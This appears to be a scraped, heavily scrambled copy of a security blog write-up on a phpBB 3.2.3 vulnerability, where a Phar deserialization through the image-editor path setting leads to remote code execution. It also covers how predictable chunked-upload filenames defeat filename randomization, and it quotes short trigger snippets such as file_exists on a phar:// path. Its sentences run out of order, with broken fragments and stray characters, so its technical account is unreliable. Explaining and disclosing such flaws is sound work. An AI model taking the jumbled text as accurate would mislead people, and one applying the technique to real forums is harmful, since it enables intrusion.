The temporary filename is generated by the temporary_filepath() function. Once all chunks have been appended to the file, its filename is randomized and moved to the /phpBB3/files directory. All upload chunks are written to a temporary file. phpBB3 offers users to upload files in chunks, which means that a large file can be uploaded in multiple requests. However, a weakness in the file uploading process of attachments allows attackers to predict the filename on the server.
This means that the first step of uploading the malicious file can be done easily, but the second step of triggering the Phar deserialization fails because the attacker does not know the path to the Phar file. The filename randomization of phpBB3 is cryptographically secure, so bruteforcing the filename is not a liable option. In order to exploit the Phar deserialization, an attacker must know the exact file path of the file on the server. When evil.jpg is uploaded, it will be stored in the /phpBB3/files/ directory as a randomly generated md5 hash, for example 2_08cc076da659b5b30de5fbfe10c05270. post attachments or images), their filename is randomized. When files are uploaded to the phpBB3 forum (e.g. Phar files are extension independend file_exists('phar:///var/www/phpBB3/files/evil.jpg') Defeating filename randomization There are also Polyglot files that are valid JPG and Phar files at the same time. If the evil.phar file was renamed to evil.jpg, the above example of triggering the Phar deserialization would still work. This is because Phar files are extension independend. pdf is allowed, an attacker can still upload a valid Phar file to the server. Although only a whitelisted set of extensions, such as. Since phpBB3 allows users to upload attachments and add them to threads and posts, uploading the malicious Phar file is trivial. This means an attacker must upload the malicious Phar file to the target board. In order to trigger the Phar deserialization, the local path to the Phar file on the target server must be supplied.Įxample of triggering a phar deserialization file_exists('phar:///var/www/phpBB3/files/evil.phar') Please note that we left out some details on purpose. includes/functions_acp.php 568 function validate_config_vars($config_vars, &$cfg_array, &$error)ĥ77 $error = sprintf($user->lang, $cfg_array) įor exploitation, the following steps are necessary. The function performs this validation by checking if the file actually exists. Before updating this setting, phpBB3 tries to validate the new path with the function validate_config_vars(). Administrators are able to set the absolute path to the image editor binary on the server running phpBB3. The feature utilizes an image editor binary called Imagick. The vulnerability in phpBB3 lies in a feature that allows administrators to edit images that were uploaded to the forum. We have detailed how the new exploitation technique discovered by Sam Thomas works in our previous blogpost. Phar deserialization vulnerabilities occur if user input is passed unsanitized to any file system function in PHP, such as file_exists(). A video walkthrough of phpBB 3.2.3: Phar Deserialization to RCE Technical Details
0 kommentar(er)
